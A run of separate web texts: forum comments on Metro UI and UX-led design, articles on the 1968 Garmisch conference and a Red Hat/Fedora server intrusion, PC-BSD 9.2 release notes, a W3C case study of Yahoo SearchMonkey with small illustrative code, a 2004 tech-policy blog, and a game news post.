Actually, UX design deals with full requirements specification, process specification and even information architecture, so, in 4+1 terms, your application is 3/5 specified; deployment and implementation are left - all that remains for you is the code monkey job. Basically your job is to type the UML diagrams into Visual Studio / C# like in the old days, except this time you actually have to deduce the UML from the screenshots (internally, a lot of UX firms use UML-like notations, it's just that they don't give them to you.)

If your company has to hire a UX firm in order to design a business application, an internal tool, you're f.ed. Besides the considerable deficiencies of the Metro UI (you can't really differentiate between a button, a text entry box and an info box, simply because all of them are colored rectangles with big letters), you're lost if you need to hire a consultancy firm to write a 10-liner form-based application built for native Windows and for internal employees.

And the text, "Form is not saved" just adds a bit of irony: it seems the UX guys themselves came from the stone age of Windows 3.1 or what... Anyone with 10 minutes of Google Docs or any iOS text editor knows that saving can be avoided, and it is done so on most mobile interfaces today.

No, this won't work. If you need the same design effort to design something for desktop as you have for web, you could easily do it right to web instead.

And perhaps all devs should learn psychology and UX really quick.
"If you need the same design effort to design something for desktop as you have for web, you could easily do it right to web instead."And by doing it right to web (emphasis on "right"), you've got support for mobile devices as well as conventional browsers already, without the need for a new operating system. Is Metro a solution in search of a problem?In the presentation, the developer comments at one point, "Shockingly, there are probably bugs in this app." So, there are more fundamental issues with development methods than just a fancy "new" UI. Why not address those before worrying about the niceties?
"Shockingly, there are probably bugs in this app." So, there are more fundamental issues with development methods than just a fancy "new" UI. Why not address those before worrying about the niceties?A bug is a result of a misunderstanding: it's a misunderstanding of how a certain component works, or how certain components are to interact., or what kind of approach is to be used to a certain problem.Now, you can't really avoid misunderstandings, if you have two teams working on a single product, one of them not understanding technology, the other one not understanding user interface design. The only solution to this would be that someone does both: either a technical lead, or developers understand UI design on a level that they are able to point out the misunderstandings, or UXes understand development on a level so that they're able to bring inputs to the devs which they won't misunderstand.But UI is not a nicety: it's your system to the outside world. A system is created to be used. Wether it's used by humans or other machines is a different matter, at the end of the day, it's always used by humans anyway: even an SQL database is used by office clerks at the end of the day. So, there's always a human user, as computers are deployed to solve problems for humans, not for themselves.Therefore, you can change any part of the system, as long as the UI doesn't change, users won't notice. These could be small changes, like a refactor, or large-scale changes, like full platform change from Windows to Linux, from C# to Java, from HTML to native widgets, as long as it looks exactly the same, has the exact same data, the same speed and the same bugs, for everyone actually using the system, it didn't change at all.The user interface is where, at the end of the day, your system stands or falls: it is where it's decided wether your system helped to bring humanity forward, wether it has added the sum happiness of humanity or did it detract from it.Worse, since the UI is the system for your users, it will be the language they'll speak to you: all the requirements, all the change requirements will come in in terms of UI:how they expect the system to appear to work to the outside world. The users will never give you ERDs or flowcharts they will speak the language of the UI, that's what their mental model will be based on.And since the system can only be specified in the language of the UI, it'll be specified by the guys who actually do speak that language: the UX guys. In most enterprises, it's already the UX department who does the specs.Of course, data structures and basic process flows can be deduced from that language. Worse: the UX guys do deduce it, it's just that they don't give it to you: you'll get a bunch of screenshots only. Internally, most UX firms deduce data structures and algorhithms, they'll represent it in non-standard ways, they'll build the screen mockups based on those diagrams, and then they'll throw it out and give you only the screenshots, so you'll have to start from scratch again. And since they have no engineering or mathematical background, those flows will contain certain errors.So, all in all, a design firm today doesn't do interface design only: they do a full system design, they specify every part of the system which is visible to the outside world, and will leave the implementation to the devs.Now enter Metro.Metro is a design language. 
It's like C++, with one difference: for C++ it is straightforward to know how it translates to C, and for C how it translates to assembly, which can be translated to running code. Metro wasn't built that way. Metro was designed by people with no knowledge or understanding of how software works internally, and they were deliberately separated from the technical guys. It just levitates in the air. How it should be translated to code in a consistent manner... this exercise is left to the developer, and it's not guaranteed that it's even possible.

Metro was designed so that Microsoft could have a distinct interface: so that, as a latecomer to the smartphone revolution, they couldn't be called a clone company. In order not to be a clone, it shouldn't look or behave similarly to an iPhone or an Android device. It should be fundamentally different.

And here comes its weakness as a design language: they had to throw out well-known best practices. We know, for example, that a button has to "bump out" from a plane so that people expect it to be pressable. This has been shown both with physical devices (e.g. totally flat remote controls) and with virtual interfaces (e.g. the Athena widget library). When something doesn't bump out, there's always a moment of mental confusion. It doesn't have to recede on press, as long as it gives good feedback (something actually happens immediately), but it has to bump out. Sometimes there's only one best way to do something, and anything else you do will be inferior. It doesn't matter that you had a business reason to be different: your interface will be inferior.

But the problem here, again, is not that. The problem is that Metro wasn't designed with the developer in mind. If it takes a design firm to do a simple internal app, that means every company adopting the new MS technologies will have to employ a UX department on a permanent basis. And it means that devs won't get to design even a hello world. They're there just to code, like in the old days of tower architects.
2015-48/3682/en_head.json.gz/12392 | Cold War comfort on software engineering’s birthday
Yesterday's issues at 40
Phil Manchester
India's IT giants left gasping after water shortage
How Alan Turing wanted to base EDSAC's memory on BOOZE
Now pay attention, 007: James Bond's Q re-booted
Other topics discussed at Garmisch continue to preoccupy software producers even now. They included how to build reliable software for large projects and deliver it on time, how to devise proper education paths for programmers, and what methods and technologies might make programming easier.
The solutions put forward fitted well with the theme of software engineering in that they sought to move software production towards being a manufacturing process. Key to this was the concept of the software component - the subject of a presentation by another eminent software pioneer Doug McIlroy of Bell Labs.
"Coming from one of the larger sophisticated users of machines, I have ample opportunity to see the tragic waste of current software writing techniques," McIlroy began. "At Bell Telephone Laboratories, we have about 100 general purpose machines from a dozen manufacturers. Even though many are dedicated to special applications, a tremendous amount of similar software must be written for each.
"What I have just asked for is simply industrialism, with programming terms substituted for some of the more mechanically oriented terms appropriate to mass production. I think there are considerable areas of software ready, if not overdue, for this approach," he went on.
McIlroy's later contributions to the then-embryonic Unix operating system put these ideas into practice and the concept of components has, of course, since become enshrined in modern software production.
But despite the improvements made in software production in the last 40 years, there still remains a lot of work to be done to fully realize the ambitions of the Garmisch conference. Brian Randell emeritus professor of computing at Newcastle University and co-editor of the Garmisch proceedings in an interview with The Register told us that while there has been some progress, a great deal more work remains to be done.
Timeless issues
"The big change has been the growth of mass-installed packaged software - which did not exist at the time of Garmisch," Randell said. "We have seen the power of evolution work very well to create a wonderful variety of high-quality software. But in the area of custom-built software - the focus of the 1968 conference - we still face huge problems and there are still horror stories about large projects which have failed."
Randell acknowledged that the problems software engineers are trying to solve now are much more complex than they were 40 years ago - but he is disappointed that there has not been more progress in three key areas.
"I would like to see better program language and development environment support - it is too fragmented and there are around 8,000 different programming languages which is very divisive.
"I would have liked to have seen more extensive use of components, and I would like to see more progress in multiprocessing. There are a lot of vague things being said about 'multicore' these days - but you don't solve a research problem by giving it a new name."
Many of the Garmisch participants have moved on to the computer room in the sky and the rest are retired or semi-retired. But the legacy they created in a German town 40 years ago - that software production was important enough to merit serious, disciplined study - will live on for a long time. ®
2015-48/3682/en_head.json.gz/12809 | Red Hat, Fedora servers infiltrated by attackers
Unknown attackers infiltrated Red Hat and Fedora servers but did not …
by Ryan Paul
Linux distributor Red Hat has issued a statement revealing that its servers were illegally infiltrated by unknown intruders. According to the company, internal audits have confirmed that the integrity of the Red Hat Network software deployment system was not compromised. The community-driven Fedora project, which is sponsored by Red Hat, also fell victim to a similar attack.

"Last week Red Hat detected an intrusion on certain of its computer systems and took immediate action," Red Hat said in a statement. "We remain highly confident that our systems and processes prevented the intrusion from compromising RHN or the content distributed via RHN and accordingly believe that customers who keep their systems updated using Red Hat Network are not at risk."

Although the attackers did not penetrate into Red Hat's software deployment system, they did manage to sign a handful of Red Hat Enterprise Linux OpenSSH packages. Red Hat has responded by issuing an OpenSSH update and providing a command-line tool that administrators can use to check their systems for potentially compromised OpenSSH packages.

Key pieces of Fedora's technical infrastructure were initially disabled earlier this month following a mailing list announcement which indicated only that Fedora personnel were addressing a technical issue of some kind. Fedora project leader and board chairman Paul W. Frields clarified the situation on Friday with a follow-up post in which he indicated that the outage was prompted by a security breach. Fedora source code was not tampered with, he wrote, and there are no discrepancies in any of the packages. The system used to sign Fedora packages was among those affected by the incursion, but he claims that the key itself was not compromised. The keys have been replaced anyway, as a precautionary measure.

"While there is no definitive evidence that the Fedora key has been compromised, because Fedora packages are distributed via multiple third-party mirrors and repositories, we have decided to convert to new Fedora signing keys," he wrote. "Among our other analyses, we have also done numerous checks of the Fedora package collection, and a significant amount of source verification as well, and have found no discrepancies that would indicate any loss of package integrity."

Assuming that Red Hat and Fedora are accurately conveying the scope and nature of the intrusion, the attacker was effectively prevented from causing any serious damage. Red Hat's security measures were apparently sufficient to stave off a worst-case scenario, but the intrusion itself is highly troubling. Red Hat has not disclosed the specific vulnerability that the intruders exploited to gain access to the systems.

Like the recent Debian openssl fiasco, which demonstrated the need for higher code review standards, this Red Hat intrusion reflects the importance of constant vigilance and scrutiny. When key components of open source development infrastructure are compromised, it undermines the trust of the end-user community. In this case, Red Hat has clearly dodged the bullet, but the situation could have been a lot worse.

Further reading
Red Hat: OpenSSH blacklist script
Paul Frields: Infrastructure report
2015-48/3682/en_head.json.gz/13442 | What's New/9.2
Based on FreeBSD 9.2-RELEASE, which adds this [NO URL YET] list of features.
PC-BSD® is only available on 64-bit systems and the graphical installer will format the selected drive(s) or partition as ZFS. This means that images are no longer provided for 32-bit systems and that the graphical installer no longer provides an option to format with UFS.
GRUB is used to provide the graphical boot menu. It provides support for multiple boot environments, serial consoles, GPT booting, UEFI, graphics, and faster loading of kernel modules. During installation, most other existing operating systems will automatically be added to the boot menu.
The system has changed from the traditional ports system to pkgng and all of the PC-BSD® utilities that deal with installing or updating software use pkgng. This means that you can safely install non-PBI software from the command line and that a system upgrade will no longer delete non-PBI software.
The pkgng repository used by the software installed with the operating system is updated on or about the 5th and 20th of each month and a new freebsd-update patch is released on the 1st of each month.
The PC-BSD® utilities that deal with installing software or updates use aria2[1] which greatly increases download speed over slow links. aria2 achieves this by downloading a file from multiple sources over multiple protocols in order to utilize the maximum download bandwidth. The pc-pkg command has been added as a wrapper script to pkg. Use pc-pkg if you wish to increase your download speed when installing or upgrading pkgng packages.
PC-BSD® uses a Content Delivery Network (CDN) service for its network backbone. This means that users no longer have to pick a mirror close to their geographical location in order to get decent download speeds when downloading PC-BSD, updates, or software. It will also prevent failed updates as it removes the possibility of a mirror being out of date or offline.
The source code repository for PC-BSD® has changed to GitHub[2]. Instructions for obtaining the source code using git can be found on our trac site[3].
The installer provides a built-in status tip bar, instead of tooltips, to display text about the moused-over widget.
If a non-English language is selected during installation, the post-installation configuration screens will automatically be displayed in the selected language.
The initial installation screen provides an option to load a saved installation configuration file from a FAT-formatted USB stick.
The installer provides an option to install a Desktop or a Server. If you select to Install a Server, it will install TrueOS®, a command-line version of FreeBSD which adds the command-line versions of the PC-BSD® utilities.
The Advanced Mode screen provides configurable options to force 4K sector size, install GRUB, and set the ZFS pool name.
The installation summary screen provides an option to save configuration of the current installation selections to a FAT-formatted USB stick so that it can be re-used at a later time.
The PEFS encryption system has replaced the GELI encryption system. PEFS offers several benefits over GELI. Rather than encrypting the entire disk(s), which may expose too much known cryptographic data, it can be used on a per-user basis to encrypt that user's home directory. When the user logs in, their home directory is automatically decrypted and it is again encrypted when the user logs out. PEFS supports hardware acceleration. It can also be used to encrypt other directories using the command line; read man pefs for examples.
The encryption option has been removed from the installer and has been replaced by a "Encrypt user files" checkbox in the post-installation Create a User Screen for the primary login account and in the User Manager utility for creating additional user accounts. If you choose to use PEFS, it is very important to select a good password that you will not forget. At this time, the password cannot be easily changed as it is associated with the encryption key. A future version of PC-BSD® will provide a utility for managing encryption keys. In the mean time, this forum post provides a work around if you need to change a password of a user that is using PEFS.
It is possible to easily Convert a FreeBSD System to PC-BSD®.
When administrative access is needed, the user will be prompted for their own password. This means that users do not have to know the root password. Any user which is a member of the wheel group will have the ability to gain administrative access. By default, the only user in this group is the user account that you create during post-installation configuration. If additional users need this ability, use the Groups tab of User Manager to add them to the wheel group.
AppCafe® has been re-designed with a cleaner code base. New features include the ability to perform actions on multiple applications, save downloaded .pbi files to a specified directory, downgrade installed software if an earlier version is available as a PBI, and improved search ability. EasyPBI has been revamped as version 2, making it even easier to create PBIs.
A graphical Package Manager utility has been added to Control Panel.
A graphical Boot Manager utility for managing boot environments and the GRUB configuration has been added to Control Panel.
The mirrors tab of System Manager has been removed as downloads are provided through a CDN.
The system packages tab has been removed from System Manager as this functionality is provided in Package Manager.
The boot screen section has been removed from System Manager.
The Mount Tray interface and detection algorithm has been improved. It can also mount an ISO to a memory disk.
A graphical PC-BSD® Bug Reporting utility has been added to Control Panel.
Many improvements to Warden® including the ability to create jails by hostname instead of by IP address, jail IP addresses can be changed after jail creation, vimage can be enabled/disabled on a per-jail basis, IPv4 or IPv6 addressing can be enabled or disabled, aliases can be added on a per-jail basis, and jail sysctls can be easily enabled on a per-jail basis.
A Template Manager has been added to Warden®. Templates can be added then used to create a new jail. For example, templates can be used to install different versions of FreeBSD and have been tested from FreeBSD 4.1.1 to FreeBSD-CURRENT.
The ability to use an external DHCP server has been added to Thin Client and the ports collection is no longer a requirement for using this script.
The system uses /etc/rc.conf.pcbsd as the default, desktop operating system version of the RC configuration file. The server operating system version of this file is called /etc/rc.conf.trueos. Do not make any changes to either of these files. Instead, make any needed customizations to /etc/rc.conf. This way, when the system is upgraded, changes to the default configuration file will not affect any settings and overrides which have been placed into /etc/rc.conf. The default wallpaper has been updated and 9.2 is referred to as PC-BSD® Isotope Infusion to differentiate it from 9.1.
The graphical gsmartcontrol[4] command has been added to PC-BSD® and the command line equivalent smartctl has been added to both PC-BSD® and TrueOS®. These utilities can be used to inspect and test the system's SMART[5]-capable hard drives to determine their health.
Mosh has been added to base to provide an SSH replacement over intermittent links.
VirtualBox[6] has been added to base which should prevent kernel module mis-matches. If you are currently using the VirtualBox PBI, you should uninstall it.
↑ http://aria2.sourceforge.net/
↑ https://github.com/pcbsd/
↑ http://trac.pcbsd.org/wiki/GettingSource
↑ http://gsmartcontrol.berlios.de/home/index.php/en/About
↑ http://en.wikipedia.org/wiki/S.M.A.R.T.
2015-48/3682/en_head.json.gz/14588 | W3C Home
Semantic Web Activity
Opening up search
Benefits of using SW
List of SW Use cases
> Semantic Web Use Cases and Case Studies
Case Study: Improving Web Search Using Metadata
Peter Mika,
Yahoo! Research,
Presenting compelling search results depends critically on understanding what is there to be presented on the first place. Given that the current generation of search engines have a very limited understanding of the query entered by the user, the content returned as a result and the relationship of the two, the opportunities for customizing search results have been limited.
The majority of Web pages today are generated from databases, and Web site owners increasingly are providing APIs to this data or embedding information inside their HTML pages with microformats, eRDF, or RDFa. In other cases, structured data can be extracted with relative ease from Web pages that follow a template using XSLT stylesheets.
SearchMonkey reuses structured data to improve search result display with benefits to both search users, developers, and publishers of web content. The first type of applications are focusing on remaking the abstracts on the search result page: Figure 1 shows the kind of presentations that structured data enables in this space. Based on data, the image representing the object can be easily singled out. One can also easily select the most important attributes of the object to be shown in a table format. Similarly for links: the data tells which links represent important actions the user can take (e.g. play the video, buy the product) and these links can be arranged in a way that their function is clear. In essence, knowledge of the data and its semantics enables to present the page in a much more informative, attractive, and concise way.
Figure 1: search results using SearchMonkey
The benefits for publishers are immediately clear: when presenting their page this way publishers can expect more clicks and higher quality traffic flowing to their site. In fact, several large publishers have moved to implement semantic metadata markup (microformats, eRDF, RDFa) specifically for providing data to SearchMonkey.
On the other hand, users also stand to benefit from a better experience. The only concerns on the users' part are the possibility of opting out and having a system free of spam. Both concerns are addressed by the Yahoo Application Gallery. As shown in Figure 2, the Gallery allows users to selectively opt in to particular SearchMonkey applications. Users also have a small number of high-quality applications that are turned on by default. The gallery is also an effective spam detection mechanism: applications that are popular are unlikely to contain spam. It is also important to note that the presence of metadata does not affect the ranking of pages. Pages that are trusted by the search engine based on other metrics can also be expected to contain trustable metadata.
For developers, the excitement of the system is in the possibility to take part in the transformation of search and develop applications that are possibly displayed to millions of users every day. Needless to say, many publishers become developers themselves, creating applications right after they have added metadata to their own pages.
Figure 2: Yahoo Application Gallery (a larger version of the image is also available)
The high level architecture of the system (shown in Figure 3) can be almost entirely reconstructed from the above description. The user’s applications trigger on URLs in the search result page, transforming the search results. The inputs of the system are as follows:
Metadata embedded inside HTML pages (microformats, eRDF, RDFa) and collected by Yahoo Slurp, the Yahoo crawler during the regular crawling process.
Custom data services extract metadata from HTML pages using XSLT or they wrap APIs implemented as Web Services.
Metadata can be submitted by publishers. Feeds are polled at regular intervals.
Figure 3: High level architecture of the system
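Of the three inputs above, the XSLT route is the easiest to picture. The sketch below is only an illustration of the idea, written in Python with lxml rather than anything SearchMonkey itself ships; the stylesheet name and the <field name="...">value</field> output convention are invented for the example. A stylesheet written against one publisher's HTML template pulls out named fields, and those fields become the structured data that a presentation application later consumes.

    from lxml import etree

    # Hypothetical stylesheet written against one publisher's page template.
    transform = etree.XSLT(etree.parse("extract_product.xsl"))

    def extract_fields(html_text):
        """Run the stylesheet over one crawled page and collect name/value pairs."""
        page = etree.fromstring(html_text, etree.HTMLParser())
        result = transform(page)
        # Assume the stylesheet emits <field name="...">value</field> elements.
        return {f.get("name"): f.text for f in result.getroot().iter("field")}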
Developers create custom data services and presentation applications using an online tool (see Figure 4). This tool is a central piece of the SearchMonkey experience: it gives developers access to all their services and applications. When defining new custom data services, first some basic information is provided such as name and description of the service and whether it will execute an XSLT or call a Web Service. In the next step, the developer defines the trigger pattern and some example URLs to test the service with. Next, the developer constructs the stylesheet to extract data or specifies the Web Service endpoint to call. (Web Services receive the URL of the page as an input.) When developing XSLTs, the results of the extraction are shown immediately in a preview to help developers debug their stylesheets. After that the developer can share the service for others to build applications on and can also start building his own presentation application right away. Note that custom data services are not required if the application only uses one of the other two data sources (embedded metadata or feeds).
Creating a presentation application follows a similar wizard-like dialogue. The developer provides the application’s name and some other basic information, then selects the trigger pattern and test URLs. Next, SearchMonkey shows the schema of the data available for those URLs taking into account all sources (embedded metadata, XSLT, Web Services, feeds). The developer can select the required elements which again helps to narrow down when the application should be triggered: if a required piece of the data is not available for a particular page, the application will not be executed. Then as the main step of the process, the developer builds a PHP function that returns the values to be plugged into the presentation template. As with stylesheets, the results of the application are shown in a preview window that is updated whenever the developer saves the application. In practice, most PHP applications simply select some data to display or contain only simple manipulations of the data. The last step is again the sharing of the application.
Figure 4: Online application development tool (a larger version of the image is also available)
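The presentation function described above is then little more than a mapping from extracted fields to the slots of the enhanced-result template. The toy version below is written in Python purely for readability; the real applications are PHP functions inside SearchMonkey, and the field and slot names here are invented:

    def build_enhanced_result(data):
        """Map extracted metadata onto the slots of an enhanced abstract."""
        return {
            "title": data.get("name"),
            "image": data.get("photo"),
            "deep_links": [data[k] for k in ("play", "buy", "reviews") if data.get(k)],
            "key_facts": [("Rating", data.get("rating")), ("Price", data.get("price"))],
        }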
As the description shows, the representation of data is a crucial aspect of SearchMonkey, since the output is simply a result of executing a set of transformations on Web data. Some of these transformations are performed using XSLT and some are complex enough to require a full-blown programming language such as PHP. What connects these pieces is a canonical representation of structured data.
To understand better the choices made in dealing with structured data it is useful to summarize the main requirements that any solution must fulfill. These are as follows:
An application platform based on structured data. As described above, the starting point of SearchMonkey was the observation that the (vast) majority of Web pages on the Web are generated from some sort of a database, in other words driven by structured data. Publishers are increasingly realizing the benefits of opening up both data and services in order to allow others to create mash-ups, widgets or other small, non-commercial applications using their content. (And in turn, developers are demanding more and more the possibility to have access to data.) The preferred method of opening up data is either to provide a custom API or embed semantic markup in HTML pages using microformats. Thus SearchMonkey requires a data representation (syntax) that could generally capture structured data and a schema language that provides a minimally required set of primitives such as classes, attributes and a system of data types. The syntax and semantics should allow to capture the full content in typical microformat data and the languages used should be open to extensions as much as possible.
Web-wide application interoperability. The queries received by a search engine and the content returned as a result cover practically all domains of human interest. While it would have been easier to develop, a solution that would limit the domains of application would not meet the need of a global search product as it would not able to capture the long tail of query and content production. The question of interoperability is complicated by the fact that the application may be developed by someone other than the publisher of the data. On the one hand, this means that data needs to be prepared for serendipitous reuse, i.e. a developer should be able to understand the meaning of the data (semantics) by consulting its description (minimally, a human readable documentation of the schema). On the other hand, the framework should support building applications that can deal with data they can only partially understand (for example, because it mixes data from different schemas). Changes in the underlying representation of the data also need to be tolerated as much as possible.
Ease of use. It has been often noted that the hallmark of a successful Semantic Web application is that no user can tell that it was built using semantic technologies. That novel technology should take a backstage role was also a major requirement for SearchMonkey: the development environment is targeted at the large numbers of Web developers who are familiar with PHP and XML technologies (at least to the extent that they can understand an example application and start extending or modifying it to fit their needs). However, developers could not have been expected to know about RDF or RDFa, technologies that still ended up playing a role in the design of the system.
Key benefits of semantic technology
Semantic technologies promise a more flexible representation than XML-based technologies. Data doesn’t need to conform to a tree structure, but can follow an arbitrary graph shape. As the unit of information is triple, and not an entire document, applications can safely ignore parts of the data at a very fine-grained, triple by triple level. Merging RDF data is equally easy: data is simply merged by taking the union of the set of triples. As RDF schemas are described in RDF, this also applies to merging schema information. (Obviously true merging requires mapping equivalent classes and instances, but that is not a concern in the current system.) Semantics (vocabularies) are also completely decoupled from syntax. On the one hand, this means that RDF doesn’t prescribe a particular syntax and in fact triples can be serialized in multiple formats, including the XML based RDF/XML format. (An XML-based format was required as only XML can serve as input of XML transformations.) On the other hand, it also means that the resources described may be instances of multiple classes from possibly different vocabularies simply by virtue of using the properties in combination to describe the item. The definition of the schema can be simply retrieved by entering URIs into a web browser. RDF-based representations are also a good match for some of the input data of the system: eRDF and RDFa map directly to RDF triples. Microformats can also be re-represented in RDF by using some of the pre-existing RDF/OWL vocabularies for popular microformats.
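The point that merging RDF data is simply the union of the sets of triples can be made concrete with a toy example (plain Python sets; real data would carry full URIs and datatypes rather than the abbreviated names used here):

    # Two descriptions of the same page coming from different sources.
    from_microformat = {("page1", "dc:title", "Paella recipe"),
                        ("page1", "v:rating", "4.5")}
    from_feed        = {("page1", "dc:title", "Paella recipe"),
                        ("page1", "foaf:maker", "alice")}

    merged = from_microformat | from_feed   # graph merge = set union of triples
    assert len(merged) == 3                 # the shared triple collapses automatically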
Given the requirements, the benefits and drawbacks of these options and the trends of developments in the Web space, the choice was made to adopt RDF-based technologies. However, it was also immediately clear that RDF/XML is not an appealing form of representing RDF data. In particular, it does not allow to capture metadata about sets of triples such as the time and provenance of data, both of which play an important role in SearchMonkey. Other RDF serialization formats have been excluded on the same basis or because they are not XML-based and only XML-based formats can be input to XSL transformations.
These considerations led to the development of DataRSS, an extension of Atom for carrying structured data as part of feeds. A standard based on Atom immediately opens up the option of submitting metadata as a feed. Atom is an XML-based format which can be both input and output of XML transformation. The extension provides the data itself as well as metadata such as which application generated the data and when it was last updated. The metadata is described using only three elements: item, meta, and type. Items represent resources, metas represent literal-valued properties of resources and types provide the type(s) of an item. These elements use a subset of the attributes of RDFa that is sufficient to describe arbitrary RDF graphs (resource, rel, property, typeof). Valid DataRSS documents are thus not only valid Atom and XML, but also conform to the RDFa syntax of RDF, which means that the triples can be extracted from the payload of the feed using any RDFa parser. Figure 5 provides an example of a DataRSS feed describing personal information using FOAF (the Friend-of-a-Friend vocabulary).
Figure 5: DataRSS feed example
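Figure 5 itself is an image, so the snippet below is only a guessed reconstruction of the general shape of such a payload: a content block whose item, meta and type elements carry the RDFa-subset attributes listed above. The namespace URI and the FOAF properties chosen are illustrative, not taken from the specification. Reading the triples back out is then a small exercise:

    import xml.etree.ElementTree as ET

    DATARSS_CONTENT = """
    <content xmlns="http://example.org/ns/datarss#">
      <item resource="http://example.org/people/anna">
        <type typeof="foaf:Person"/>
        <meta property="foaf:name">Anna Example</meta>
        <meta property="foaf:nick">anna</meta>
      </item>
    </content>
    """

    ns = {"d": "http://example.org/ns/datarss#"}
    root = ET.fromstring(DATARSS_CONTENT)
    for item in root.findall("d:item", ns):
        subject = item.get("resource")
        for meta in item.findall("d:meta", ns):
            # Each meta contributes one (subject, property, literal) triple.
            print(subject, meta.get("property"), meta.text)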
A new format also brings along the question of query language. Since DataRSS is both XML and RDF, the two immediately available options were XPath and SPARQL. However, it was also immediately clear that both languages are too complex for the task at hand. Namely, presentation applications merely need to filter data by selecting a simple path through the RDF graph. Again, the choice was made to define and implement a simple new query language. (The choice is not exclusive: applications can execute XPath expressions, and the option of introducing SPARQL is also open.) As the use case is similar, this expression language is similar to Fresnel path expressions, except that expressions always begin with a type or property, and the remaining elements can only be properties. Figure 5 also gives some examples of this query language.
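The exact grammar of those expressions is not reproduced here, but the flavour is easy to sketch: an expression is rooted in a type and then walks properties step by step. The toy evaluator below uses a hypothetical dotted syntax over a handful of triples, nothing like production code:

    def query(triples, path):
        """Evaluate a dotted, type-rooted path such as 'foaf:Person.foaf:name'."""
        root_type, *props = path.split(".")
        nodes = {s for s, p, o in triples if p == "rdf:type" and o == root_type}
        for prop in props:                       # follow one property per step
            nodes = {o for s, p, o in triples if s in nodes and p == prop}
        return nodes

    triples = {("urn:anna", "rdf:type", "foaf:Person"),
               ("urn:anna", "foaf:name", "Anna Example")}
    print(query(triples, "foaf:Person.foaf:name"))    # {'Anna Example'}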
The current applications populating this platform are relatively modest transformations of structured data into a presentation of the summary of web pages. However, the platform is open to extensions that use structured data to enrich other parts of the search interface or to be deployed in different settings such as a mobile environment. Lastly, in building on semantic technologies SearchMonkey has not only accomplished its immediate goals but is well prepared for a future with an increasingly more semantic web where the semantics of data will drive not only presentation but the very process of matching user intent with the Web’s vast sources of structured knowledge.
SearchMonkey
Peter Mika. Anatomy of a SearchMonkey. Nodalities Magazine, September/October 2008.
Peter Mika. Talking with Talis (podcast).
© Copyright 2008, Yahoo!
2015-48/3683/en_head.json.gz/398 | January 24, 2004 Remember Microsoft’s "Embrace" of XML? [7:34 pm] Microsoft seeks XML-related patents
The company filed patent applications in New Zealand and the European Union that cover word processing documents stored in the XML (Extensible Markup Language) format. The proposed patent would cover methods for an application other than the original word processor to access data in the document. The U.S. Patent Office had no record of a similar application.
[...] Despite those moves toward openness, the patents could create a barrier to competing software, said Rob Helm, an analyst for research firm Directions on Microsoft.
“This is a direct challenge to software vendors who want to interoperate with Word through XML,” he said. “For example, if Corel wanted to improve WordPerfect’s support of Word by adopting its XML format…for import/export, they’d probably have to license this patent.”
The patents likely wouldn’t immediately affect the open-source software package OpenOffice, which uses different XML techniques to describe a document, Helm said. But they could prevent future versions of OpenOffice and StarOffice, its proprietary sibling, from working with Microsoft’s XML format. permalink to just this entry
From Tomorrow’s NYTimes Magazine Section [5:25 pm] The Tyranny of Copyright? — with quotes and comments from the entire ILaw group — Lessig, Zittrain, Benkler, Nesson and Fisher. (I note that I come late to this — see Donna’s links from yesterday below.)
The future of the Copy Left’s efforts is still an open question. James Boyle has likened the movement’s efforts to establish a cultural commons to those of the environmental movement in its infancy. Like Rachel Carson in the years before Earth Day, the Copy Left today is trying to raise awareness of the intellectual ”land” to which they believe we ought to feel entitled and to propose policies and laws that will preserve it. Just as the idea of environmentalism became viable in the wake of the last century’s advances in industrial production, the growth of this century’s information technologies, Boyle argues, will force the country to address the erosion of the cultural commons. ”The environmentalists helped us to see the world differently,” he writes, ”to see that there was such a thing as ‘the environment’ rather than just my pond, your forest, his canal. We need to do the same thing in the information environment. We have to ‘invent’ the public domain before we can save it.”
One of the callouts, put into a crosshead in the dead-tree version, makes the following stab at redefining the rhetoric (Larry Lessig’s comments in the text):
“In the cultural sphere,” says one law professor, “big media wants to build a new Soviet empire where you need permission from the central party to do anything.”
Slashdot discussion: The Tyranny of Copyright?. See also Donna’s posts: The Copyfight Hits NYT Magazine and Eyes on the Prize
After yesterday, it’s good to see that these issues are getting some exposure. But, I fear that articles like this are largely preaching to the choir. It may well be that some will be informed by this article, but it’s not at all clear that the article is generating the kind of thinking required. See the forum that the NYTimes is running alongside the article. It will be interesting to see if anything emerges there that isn’t already a Slashdot diatribe. Sor far, aside from a weird slam at the author of the article (already responded to), it’s about what you might expect.
Algorithms to Defeat Currency Copying [10:52 am] As a followup to the discussion on efforts to make copying currency difficult by putting code into PhotoShop and other tools, sharp-eye reader of Slashdot comments Su finds a link to a design feature that appears to be a part of the technique in a Slashdot comment: The EURion Constellation.
Note that others cite that this same pattern appears in the new US $20s and probably other bills — something to check on the next time you get some cash from the ATM
Update: Jan 26 — Ed Felten has some more to say about this: Photoshop and Currency | 计算机 |
2015-48/3683/en_head.json.gz/1359 | Hello guest register or sign in or with: New games are coming update 01/07/12 blog - Kark-Jocke
Kark-Jocke
Joachim Dimitri joined Jul 24, 2010 summary
Hello there and welcome to my profil, is there anything I can help you with? Information about Game, Anime-Series, Movies, Normal TV-Series or something else perhaps? I also have opportunities to help with ModDB profilers backgrounds and music, if there is anything send me a PM or comment on the comment list. Report content RSS feed New games are coming update 01/07/12
Posted by Kark-Jocke on Jul 1st, 2012 New games are coming update 01/07/12 Spec Ops: The Line
Yager Development and 2K Games released this week, "Spec Ops: The Line." The game a third person shooter with a special focus on character development and action. Set to a sand coated Dubai, the game follows three elite soldiers who have the task of finding the missing Colonel Konrad. Watch the latest developer diary, as well as the launch trailer from the game below. "Spec Ops: The Line" was released this week and is available to Xbox 360, Playstation 3 and PC. Warframe
Digital Extremes released "Darkness II" a little earlier this year. It will not however say that they have been lazy. This week they revealed because his next title, called "Warframe." So far very little is known about the game, but there is no doubt that there is a potential here. See the unveiling video below. "Warframe" has no release date yet and the game is, so far only announced for PC. Planetside 2
Although this year's E3 is now a few weeks behind us, it will not however say that we have gotten us everything. Among the many missed out, we find a presentation of "Planetside 2". The presentation is a little dry, but it shares brotherly with information about the game's systems. See the presentation video below. "Planetside 2" is currently no release date. The game is only for PC. The Amazing Spider-Man
Beenox and Activision released this week, "The Amazing Spider-Man," based on this summer's upcoming blockbuster movie of the same name. The game is certainly set for the film's action and the film is a little over a week from the big screen. Some, myself included, may postpone the game until they have seen the film. While we wait, we can however check out the latest developer diary from the game, which can be seen below. "The Amazing Spider-Man" was released this week and is available to Xbox 360 and Playstation 3 There are also special versions for Wii, DS and 3DS, while a PC version is expected Aug. 10. Dead or Alive 5
